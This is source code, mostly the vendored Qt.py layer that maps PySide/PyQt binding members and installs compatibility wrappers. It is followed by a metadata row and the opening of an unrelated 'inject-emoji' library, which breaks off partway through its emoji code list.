"QtGui.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtGui.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtGui.QItemSelection": "QtCore.QItemSelection",
"QtGui.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.Property": "QtCore.Property",
"QtCore.Signal": "QtCore.Signal",
"QtCore.Slot": "QtCore.Slot",
"QtGui.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtGui.QAbstractPrintDialog": "QtPrintSupport.QAbstractPrintDialog",
"QtGui.QPageSetupDialog": "QtPrintSupport.QPageSetupDialog",
"QtGui.QPrintDialog": "QtPrintSupport.QPrintDialog",
"QtGui.QPrintEngine": "QtPrintSupport.QPrintEngine",
"QtGui.QPrintPreviewDialog": "QtPrintSupport.QPrintPreviewDialog",
"QtGui.QPrintPreviewWidget": "QtPrintSupport.QPrintPreviewWidget",
"QtGui.QPrinter": "QtPrintSupport.QPrinter",
"QtGui.QPrinterInfo": "QtPrintSupport.QPrinterInfo",
"QtUiTools.QUiLoader": ["QtCompat.loadUi", _loadUi],
"shiboken.wrapInstance": ["QtCompat.wrapInstance", _wrapinstance],
"shiboken.unwrapInstance": ["QtCompat.getCppPointer", _getcpppointer],
"shiboken.isValid": ["QtCompat.isValid", _isvalid],
"QtGui.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtGui.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMsgHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtGui.QStyleOptionViewItemV4": "QtCompat.QStyleOptionViewItemV4",
},
"PyQt4": {
"QtGui.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtGui.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtGui.QItemSelection": "QtCore.QItemSelection",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtGui.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.pyqtProperty": "QtCore.Property",
"QtCore.pyqtSignal": "QtCore.Signal",
"QtCore.pyqtSlot": "QtCore.Slot",
"QtGui.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtGui.QAbstractPrintDialog": "QtPrintSupport.QAbstractPrintDialog",
"QtGui.QPageSetupDialog": "QtPrintSupport.QPageSetupDialog",
"QtGui.QPrintDialog": "QtPrintSupport.QPrintDialog",
"QtGui.QPrintEngine": "QtPrintSupport.QPrintEngine",
"QtGui.QPrintPreviewDialog": "QtPrintSupport.QPrintPreviewDialog",
"QtGui.QPrintPreviewWidget": "QtPrintSupport.QPrintPreviewWidget",
"QtGui.QPrinter": "QtPrintSupport.QPrinter",
"QtGui.QPrinterInfo": "QtPrintSupport.QPrinterInfo",
# "QtCore.pyqtSignature": "QtCore.Slot",
"uic.loadUi": ["QtCompat.loadUi", _loadUi],
"sip.wrapinstance": ["QtCompat.wrapInstance", _wrapinstance],
"sip.unwrapinstance": ["QtCompat.getCppPointer", _getcpppointer],
"sip.isdeleted": ["QtCompat.isValid", _isvalid],
"QtCore.QString": "str",
"QtGui.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtGui.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMsgHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtGui.QStyleOptionViewItemV4": "QtCompat.QStyleOptionViewItemV4",
},
}
""" Compatibility Members
This dictionary is used to build Qt.QtCompat objects that provide a consistent
interface for obsolete members, and differences in binding return values.
{
"binding": {
"classname": {
"targetname": "binding_namespace",
}
}
}
"""
_compatibility_members = {
"PySide2": {
"QWidget": {
"grab": "QtWidgets.QWidget.grab",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.sectionsClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setSectionsClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.sectionResizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setSectionResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.sectionsMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setSectionsMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PyQt5": {
"QWidget": {
"grab": "QtWidgets.QWidget.grab",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.sectionsClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setSectionsClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.sectionResizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setSectionResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.sectionsMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setSectionsMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PySide": {
"QWidget": {
"grab": "QtWidgets.QPixmap.grabWidget",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.isClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.resizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.isMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PyQt4": {
"QWidget": {
"grab": "QtWidgets.QPixmap.grabWidget",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.isClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.resizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.isMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
}
def _apply_site_config():
try:
import QtSiteConfig
except ImportError:
# If no QtSiteConfig module found, no modifications
# to _common_members are needed.
pass
else:
# Provide the ability to modify the dicts used to build Qt.py
if hasattr(QtSiteConfig, "update_members"):
QtSiteConfig.update_members(_common_members)
if hasattr(QtSiteConfig, "update_misplaced_members"):
QtSiteConfig.update_misplaced_members(members=_misplaced_members)
if hasattr(QtSiteConfig, "update_compatibility_members"):
QtSiteConfig.update_compatibility_members(members=_compatibility_members)
def _new_module(name):
return types.ModuleType(__name__ + "." + name)
def _import_sub_module(module, name):
"""import_sub_module will mimic the function of importlib.import_module"""
module = __import__(module.__name__ + "." + name)
for level in name.split("."):
module = getattr(module, level)
return module
def _setup(module, extras):
"""Install common submodules"""
Qt.__binding__ = module.__name__
def _warn_import_error(exc, module):
msg = str(exc)
if "No module named" in msg:
return
_warn("ImportError(%s): %s" % (module, msg))
for name in list(_common_members) + extras:
try:
submodule = _import_sub_module(module, name)
except ImportError as e:
try:
# For extra modules like sip and shiboken that may not be
# children of the binding.
submodule = __import__(name)
except ImportError as e2:
_warn_import_error(e, name)
_warn_import_error(e2, name)
continue
setattr(Qt, "_" + name, submodule)
if name not in extras:
# Store reference to original binding,
# but don't store speciality modules
# such as uic or QtUiTools
setattr(Qt, name, _new_module(name))
def _reassign_misplaced_members(binding):
"""Apply misplaced members from `binding` to Qt.py
Arguments:
binding (dict): Misplaced members
"""
for src, dst in _misplaced_members[binding].items():
dst_value = None
src_parts = src.split(".")
src_module = src_parts[0]
src_member = None
if len(src_parts) > 1:
src_member = src_parts[1:]
if isinstance(dst, (list, tuple)):
dst, dst_value = dst
dst_parts = dst.split(".")
dst_module = dst_parts[0]
dst_member = None
if len(dst_parts) > 1:
dst_member = dst_parts[1]
# Get the member we want to store in the namesapce.
if not dst_value:
try:
_part = getattr(Qt, "_" + src_module)
while src_member:
member = src_member.pop(0)
_part = getattr(_part, member)
dst_value = _part
except AttributeError:
# If the member we want to store in the namespace does not
# exist, there is no need to continue. This can happen if a
# request was made to rename a member that didn't exist, for
# example if QtWidgets isn't available on the target platform.
_log("Misplaced member has no source: {0}".format(src))
continue
try:
src_object = getattr(Qt, dst_module)
except AttributeError:
if dst_module not in _common_members:
# Only create the Qt parent module if its listed in
# _common_members. Without this check, if you remove QtCore
# from _common_members, the default _misplaced_members will add
# Qt.QtCore so it can add Signal, Slot, etc.
msg = 'Not creating missing member module "{m}" for "{c}"'
_log(msg.format(m=dst_module, c=dst_member))
continue
# If the dst is valid but the Qt parent module does not exist
# then go ahead and create a new module to contain the member.
setattr(Qt, dst_module, _new_module(dst_module))
src_object = getattr(Qt, dst_module)
# Enable direct import of the new module
sys.modules[__name__ + "." + dst_module] = src_object
if not dst_value:
dst_value = getattr(Qt, "_" + src_module)
if src_member:
dst_value = getattr(dst_value, src_member)
setattr(src_object, dst_member or dst_module, dst_value)
def _build_compatibility_members(binding, decorators=None):
"""Apply `binding` to QtCompat
Arguments:
binding (str): Top level binding in _compatibility_members.
decorators (dict, optional): Provides the ability to decorate the
original Qt methods when needed by a binding. This can be used
to change the returned value to a standard value. The key should
be the classname, the value is a dict where the keys are the
target method names, and the values are the decorator functions.
"""
decorators = decorators or dict()
# Allow optional site-level customization of the compatibility members.
# This method does not need to be implemented in QtSiteConfig.
try:
import QtSiteConfig
except ImportError:
pass
else:
if hasattr(QtSiteConfig, "update_compatibility_decorators"):
QtSiteConfig.update_compatibility_decorators(binding, decorators)
_QtCompat = type("QtCompat", (object,), {})
for classname, bindings in _compatibility_members[binding].items():
attrs = {}
for target, binding in bindings.items():
namespaces = binding.split(".")
try:
src_object = getattr(Qt, "_" + namespaces[0])
except AttributeError as e:
_log("QtCompat: AttributeError: %s" % e)
# Skip reassignment of non-existing members.
# This can happen if a request was made to
# rename a member that didn't exist, for example
# if QtWidgets isn't available on the target platform.
continue
# Walk down any remaining namespace getting the object assuming
# that if the first namespace exists the rest will exist.
for namespace in namespaces[1:]:
src_object = getattr(src_object, namespace)
# decorate the Qt method if a decorator was provided.
if target in decorators.get(classname, []):
# staticmethod must be called on the decorated method to
# prevent a TypeError being raised when the decorated method
# is called.
src_object = staticmethod(decorators[classname][target](src_object))
attrs[target] = src_object
# Create the QtCompat class and install it into the namespace
compat_class = type(classname, (_QtCompat,), attrs)
setattr(Qt.QtCompat, classname, compat_class)
def _pyside2():
"""Initialise PySide2
These functions serve to test the existence of a binding
along with set it up in such a way that it aligns with
the final step; adding members from the original binding
to Qt.py
"""
import PySide2 as module
extras = ["QtUiTools"]
try:
try:
# Before merge of PySide and shiboken
import shiboken2
except ImportError:
# After merge of PySide and shiboken, May 2017
from PySide2 import shiboken2
extras.append("shiboken2")
except ImportError:
pass
_setup(module, extras)
Qt.__binding_version__ = module.__version__
if hasattr(Qt, "_shiboken2"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = shiboken2.delete
if hasattr(Qt, "_QtUiTools"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtCore"):
Qt.__qt_version__ = Qt._QtCore.qVersion()
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright, roles or []
)
)
if hasattr(Qt, "_QtWidgets"):
Qt.QtCompat.setSectionResizeMode = (
Qt._QtWidgets.QHeaderView.setSectionResizeMode
)
_reassign_misplaced_members("PySide2")
_build_compatibility_members("PySide2")
def _pyside():
"""Initialise PySide"""
import PySide as module
extras = ["QtUiTools"]
try:
try:
# Before merge of PySide and shiboken
import shiboken
except ImportError:
# After merge of PySide and shiboken, May 2017
from PySide import shiboken
extras.append("shiboken")
except ImportError:
pass
_setup(module, extras)
Qt.__binding_version__ = module.__version__
if hasattr(Qt, "_shiboken"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = shiboken.delete
if hasattr(Qt, "_QtUiTools"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtGui"):
setattr(Qt, "QtWidgets", _new_module("QtWidgets"))
setattr(Qt, "_QtWidgets", Qt._QtGui)
if hasattr(Qt._QtGui, "QX11Info"):
setattr(Qt, "QtX11Extras", _new_module("QtX11Extras"))
Qt.QtX11Extras.QX11Info = Qt._QtGui.QX11Info
Qt.QtCompat.setSectionResizeMode = Qt._QtGui.QHeaderView.setResizeMode
if hasattr(Qt, "_QtCore"):
Qt.__qt_version__ = Qt._QtCore.qVersion()
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright
)
)
_reassign_misplaced_members("PySide")
_build_compatibility_members("PySide")
def _pyqt5():
"""Initialise PyQt5"""
import PyQt5 as module
extras = ["uic"]
try:
# Relevant to PyQt5 5.11 and above
from PyQt5 import sip
extras += ["sip"]
except ImportError:
try:
import sip
extras += ["sip"]
except ImportError:
sip = None
_setup(module, extras)
if hasattr(Qt, "_sip"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = sip.delete
if hasattr(Qt, "_uic"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtCore"):
Qt.__binding_version__ = Qt._QtCore.PYQT_VERSION_STR
Qt.__qt_version__ = Qt._QtCore.QT_VERSION_STR
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright, roles or []
)
)
if hasattr(Qt, "_QtWidgets"):
Qt.QtCompat.setSectionResizeMode = (
Qt._QtWidgets.QHeaderView.setSectionResizeMode
)
_reassign_misplaced_members("PyQt5")
_build_compatibility_members("PyQt5")
def _pyqt4():
"""Initialise PyQt4"""
import sip
# Validation of envivornment variable. Prevents an error if
# the variable is invalid since it's just a hint.
try:
hint = int(QT_SIP_API_HINT)
except TypeError:
hint = None # Variable was None, i.e. not set.
except ValueError:
raise ImportError("QT_SIP_API_HINT=%s must be a 1 or 2")
for api in (
"QString",
"QVariant",
"QDate",
"QDateTime",
"QTextStream",
"QTime",
"QUrl",
):
try:
sip.setapi(api, hint or 2)
except AttributeError:
raise ImportError("PyQt4 < 4.6 isn't supported by Qt.py")
except ValueError:
actual = sip.getapi(api)
if not hint:
raise ImportError("API version already set to %d" % actual)
else:
# Having provided a hint indicates a soft constraint, one
# that doesn't throw an exception.
sys.stderr.write(
"Warning: API '%s' has already been set to %d.\n" % (api, actual)
)
import PyQt4 as module
extras = ["uic"]
try:
import sip
extras.append(sip.__name__)
except ImportError:
sip = None
_setup(module, extras)
if hasattr(Qt, "_sip"):
Qt.QtCompat.wrapInstance = _wrapinstance
Qt.QtCompat.getCppPointer = _getcpppointer
Qt.QtCompat.delete = sip.delete
if hasattr(Qt, "_uic"):
Qt.QtCompat.loadUi = _loadUi
if hasattr(Qt, "_QtGui"):
setattr(Qt, "QtWidgets", _new_module("QtWidgets"))
setattr(Qt, "_QtWidgets", Qt._QtGui)
if hasattr(Qt._QtGui, "QX11Info"):
setattr(Qt, "QtX11Extras", _new_module("QtX11Extras"))
Qt.QtX11Extras.QX11Info = Qt._QtGui.QX11Info
Qt.QtCompat.setSectionResizeMode = Qt._QtGui.QHeaderView.setResizeMode
if hasattr(Qt, "_QtCore"):
Qt.__binding_version__ = Qt._QtCore.PYQT_VERSION_STR
Qt.__qt_version__ = Qt._QtCore.QT_VERSION_STR
Qt.QtCompat.dataChanged = (
lambda self, topleft, bottomright, roles=None: self.dataChanged.emit(
topleft, bottomright
)
)
_reassign_misplaced_members("PyQt4")
# QFileDialog QtCompat decorator
def _standardizeQFileDialog(some_function):
"""Decorator that makes PyQt4 return conform to other bindings"""
def wrapper(*args, **kwargs):
ret = some_function(*args, **kwargs)
# PyQt4 only returns the selected filename, force it to a
# standard return of the selected filename, and a empty string
# for the selected filter
return ret, ""
wrapper.__doc__ = some_function.__doc__
wrapper.__name__ = some_function.__name__
return wrapper
decorators = {
"QFileDialog": {
"getOpenFileName": _standardizeQFileDialog,
"getOpenFileNames": _standardizeQFileDialog,
"getSaveFileName": _standardizeQFileDialog,
}
}
_build_compatibility_members("PyQt4", decorators)
def _none():
"""Internal option (used in installer)"""
Mock = type("Mock", (), {"__getattr__": lambda Qt, attr: None})
Qt.__binding__ = "None"
Qt.__qt_version__ = "0.0.0"
Qt.__binding_version__ = "0.0.0"
Qt.QtCompat.loadUi = lambda uifile, baseinstance=None: None
Qt.QtCompat.setSectionResizeMode = lambda *args, **kwargs: None
for submodule in _common_members.keys():
setattr(Qt, submodule, Mock())
setattr(Qt, "_" + submodule, Mock())
def _log(text):
if QT_VERBOSE:
sys.stdout.write("Qt.py [info]: %s\n" % text)
def _warn(text):
try:
sys.stderr.write("Qt.py [warning]: %s\n" % text)
except UnicodeDecodeError:
import locale
encoding = locale.getpreferredencoding()
sys.stderr.write("Qt.py [warning]: %s\n" % text.decode(encoding))
def _convert(lines):
"""Convert compiled .ui file from PySide2 to Qt.py
Arguments:
lines (list): Each line of of .ui file
Usage:
>> with open("myui.py") as f:
.. lines = _convert(f.readlines())
"""
def parse(line):
line = line.replace("from PySide2 import", "from Qt import QtCompat,")
line = line.replace("QtWidgets.QApplication.translate", "QtCompat.translate")
if "QtCore.SIGNAL" in line:
raise NotImplementedError(
"QtCore.SIGNAL is missing from PyQt5 "
"and so Qt.py does not support it: you "
"should avoid defining signals inside "
"your ui files."
)
return line
parsed = list()
for line in lines:
line = parse(line)
parsed.append(line)
return parsed
def _cli(args):
"""Qt.py command-line interface"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"--convert", help="Path to compiled Python module, e.g. my_ui.py"
)
parser.add_argument(
"--compile",
help="Accept raw .ui file and compile with native " "PySide2 compiler.",
)
parser.add_argument(
"--stdout", help="Write to stdout instead of file", action="store_true"
)
parser.add_argument(
"--stdin", help="Read from stdin instead of file", action="store_true"
)
args = parser.parse_args(args)
if args.stdout:
raise NotImplementedError("--stdout")
if args.stdin:
raise NotImplementedError("--stdin")
if args.compile:
raise NotImplementedError("--compile")
if args.convert:
sys.stdout.write(
"#\n"
"# WARNING: --convert is an ALPHA feature.\n#\n"
"# See https://github.com/mottosso/Qt.py/pull/132\n"
"# for details.\n"
"#\n"
)
#
# ------> Read
#
with open(args.convert) as f:
lines = _convert(f.readlines())
backup = "%s_backup%s" % os.path.splitext(args.convert)
sys.stdout.write('Creating "%s"..\n' % backup)
shutil.copy(args.convert, backup)
#
# <------ Write
#
with open(args.convert, "w") as f:
f.write("".join(lines))
sys.stdout.write('Successfully converted "%s"\n' % args.convert)
class MissingMember(object):
"""
A placeholder type for a missing Qt object not
included in Qt.py
Args:
name (str): The name of the missing type
details (str): An optional custom error message
"""
ERR_TMPL = (
"{} is not a common object across PySide2 "
"and the other Qt bindings. It is not included "
"as a common member in the Qt.py layer"
)
def __init__(self, name, details=""):
self.__name = name
self.__err = self.ERR_TMPL.format(name)
if details:
self.__err = "{}: {}".format(self.__err, details)
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self.__name)
def __getattr__(self, name):
raise NotImplementedError(self.__err)
def __call__(self, *a, **kw):
raise NotImplementedError(self.__err)
def _install():
# Default order (customize order and content via QT_PREFERRED_BINDING)
default_order = ("PySide2", "PyQt5", "PySide", "PyQt4")
preferred_order = None
if QT_PREFERRED_BINDING_JSON:
# A per-vendor preferred binding customization was defined
# This should be a dictionary of the full Qt.py module namespace to
# apply binding settings to. The "default" key can be used to apply
# custom bindings to all modules not explicitly defined. If the json
# data is invalid this will raise a exception.
# Example:
# {"mylibrary.vendor.Qt": ["PySide2"], "default":["PyQt5","PyQt4"]}
try:
preferred_bindings = json.loads(QT_PREFERRED_BINDING_JSON)
except ValueError:
# Python 2 raises ValueError, Python 3 raises json.JSONDecodeError
# a subclass of ValueError
_warn(
"Failed to parse QT_PREFERRED_BINDING_JSON='%s'"
% QT_PREFERRED_BINDING_JSON
)
_warn("Falling back to default preferred order")
else:
preferred_order = preferred_bindings.get(__name__)
# If no matching binding was used, optionally apply a default.
if preferred_order is None:
preferred_order = preferred_bindings.get("default", None)
if preferred_order is None:
# If a json preferred binding was not used use, respect the
# QT_PREFERRED_BINDING environment variable if defined.
preferred_order = list(b for b in QT_PREFERRED_BINDING.split(os.pathsep) if b)
order = preferred_order or default_order
available = {
"PySide2": _pyside2,
"PyQt5": _pyqt5,
"PySide": _pyside,
"PyQt4": _pyqt4,
"None": _none,
}
_log("Order: '%s'" % "', '".join(order))
# Allow site-level customization of the available modules.
_apply_site_config()
found_binding = False
for name in order:
_log("Trying %s" % name)
try:
available[name]()
found_binding = True
break
except ImportError as e:
_log("ImportError: %s" % e)
except KeyError:
_log("ImportError: Preferred binding '%s' not found." % name)
if not found_binding:
# If not binding were found, throw this error
raise ImportError("No Qt binding were found.")
# Install individual members
for name, members in _common_members.items():
try:
their_submodule = getattr(Qt, "_%s" % name)
except AttributeError:
continue
our_submodule = getattr(Qt, name)
# Enable import *
__all__.append(name)
# Enable direct import of submodule,
# e.g. import Qt.QtCore
sys.modules[__name__ + "." + name] = our_submodule
for member in members:
# Accept that a submodule may miss certain members.
try:
their_member = getattr(their_submodule, member)
except AttributeError:
_log("'%s.%s' was missing." % (name, member))
continue
setattr(our_submodule, member, their_member)
# Install missing member placeholders
for name, members in _missing_members.items():
our_submodule = getattr(Qt, name)
for member in members:
# If the submodule already has this member installed,
# either by the common members, or the site config,
# then skip installing this one over it.
if hasattr(our_submodule, member):
continue
placeholder = MissingMember(
"{}.{}".format(name, member), details=members[member]
)
setattr(our_submodule, member, placeholder)
# Enable direct import of QtCompat
sys.modules[__name__ + ".QtCompat"] = Qt.QtCompat
# Backwards compatibility
if hasattr(Qt.QtCompat, "loadUi"):
Qt.QtCompat.load_ui = Qt.QtCompat.loadUi
_install()
# Setup Binding Enum states
Qt.IsPySide2 = Qt.__binding__ == "PySide2"
Qt.IsPyQt5 = Qt.__binding__ == "PyQt5"
Qt.IsPySide = Qt.__binding__ == "PySide"
Qt.IsPyQt4 = Qt.__binding__ == "PyQt4"
"""Augment QtCompat
QtCompat contains wrappers and added functionality
to the original bindings, such as the CLI interface
and otherwise incompatible members between bindings,
such as `QHeaderView.setSectionResizeMode`.
"""
Qt.QtCompat._cli = _cli
Qt.QtCompat._convert = _convert
# Enable command-line interface
if __name__ == "__main__":
_cli(sys.argv[1:])
# The MIT License (MIT)
#
# Copyright (c) 2016-2017 Marcus Ottosson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# In PySide(2), loadUi does not exist, so we implement it
#
# `_UiLoader` is adapted from the qtpy project, which was further influenced
# by qt-helpers which was released under a 3-clause BSD license which in turn
# is based on a solution at:
#
# - https://gist.github.com/cpbotha/1b42a20c8f3eb9bb7cb8
#
# The License for this code is as follows:
#
# qt-helpers - a common front-end to various Qt modules
#
# Copyright (c) 2015, Chris Beaumont and Thomas Robitaille
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
# * Neither the name of the Glue project nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Which itself was based on the solution at
#
# https://gist.github.com/cpbotha/1b42a20c8f3eb9bb7cb8
#
# which was released under the MIT license:
#
# Copyright (c) 2011 Sebastian Wiesner <lunaryorn@gmail.com>
# Modifications by Charl Botha <cpbotha@vxlabs.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files
# (the "Software"),to deal in the Software without restriction,
# including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
pyblish/pyblish-nuke
|
pyblish_nuke/vendor/Qt.py
|
Python
|
lgpl-3.0
| 65,250
|
[
"VisIt"
] |
913f15a0ffae38d306fb20bf0600c35ce8d448cc57cb3dec5a3ac15e9ac8b8af
|
# -*- coding: utf-8 -*-
"""
inject-emoji
~~~~~~~~~~~~
inject-emoji is a simple library, written in Python, for emoji fans.
Using codes described at emoji-cheat-sheet.com, codes found within
input data are replaced with HTML image tags in the output.
:copyright: (c) 2016 by Clay Loveless.
:license: MIT, see LICENSE for more details.
"""
import os
import re
import sys
BUNDLED_EMOJI = [
r'\+1', r'\-1', '100', '1234', '8ball', 'a', 'ab', 'abc', 'abcd', 'accept',
'aerial_tramway', 'airplane', 'alarm_clock', 'alien', 'ambulance',
'anchor', 'angel', 'anger', 'angry', 'anguished', 'ant', 'apple',
'aquarius', 'aries', 'arrow_backward', 'arrow_double_down',
'arrow_double_up', 'arrow_down', 'arrow_down_small', 'arrow_forward',
'arrow_heading_down', 'arrow_heading_up', 'arrow_left', 'arrow_lower_left',
'arrow_lower_right', 'arrow_right', 'arrow_right_hook', 'arrow_up',
'arrow_up_down', 'arrow_up_small', 'arrow_upper_left', 'arrow_upper_right',
'arrows_clockwise', 'arrows_counterclockwise', 'art', 'articulated_lorry',
'astonished', 'atm', 'b', 'baby', 'baby_bottle', 'baby_chick',
'baby_symbol', 'back', 'baggage_claim', 'balloon', 'ballot_box_with_check',
'bamboo', 'banana', 'bangbang', 'bank', 'bar_chart', 'barber', 'baseball',
'basketball', 'bath', 'bathtub', 'battery', 'bear', 'bee', 'beer', 'beers',
'beetle', 'beginner', 'bell', 'bento', 'bicyclist', 'bike', 'bikini',
'bird', 'birthday', 'black_circle', 'black_joker',
'black_medium_small_square', 'black_medium_square', 'black_nib',
'black_small_square', 'black_square', 'black_square_button', 'blossom',
'blowfish', 'blue_book', 'blue_car', 'blue_heart', 'blush', 'boar', 'boat',
'bomb', 'book', 'bookmark', 'bookmark_tabs', 'books', 'boom', 'boot',
'bouquet', 'bow', 'bowling', 'bowtie', 'boy', 'bread', 'bride_with_veil',
'bridge_at_night', 'briefcase', 'broken_heart', 'bug', 'bulb',
'bullettrain_front', 'bullettrain_side', 'bus', 'busstop',
'bust_in_silhouette', 'busts_in_silhouette', 'cactus', 'cake', 'calendar',
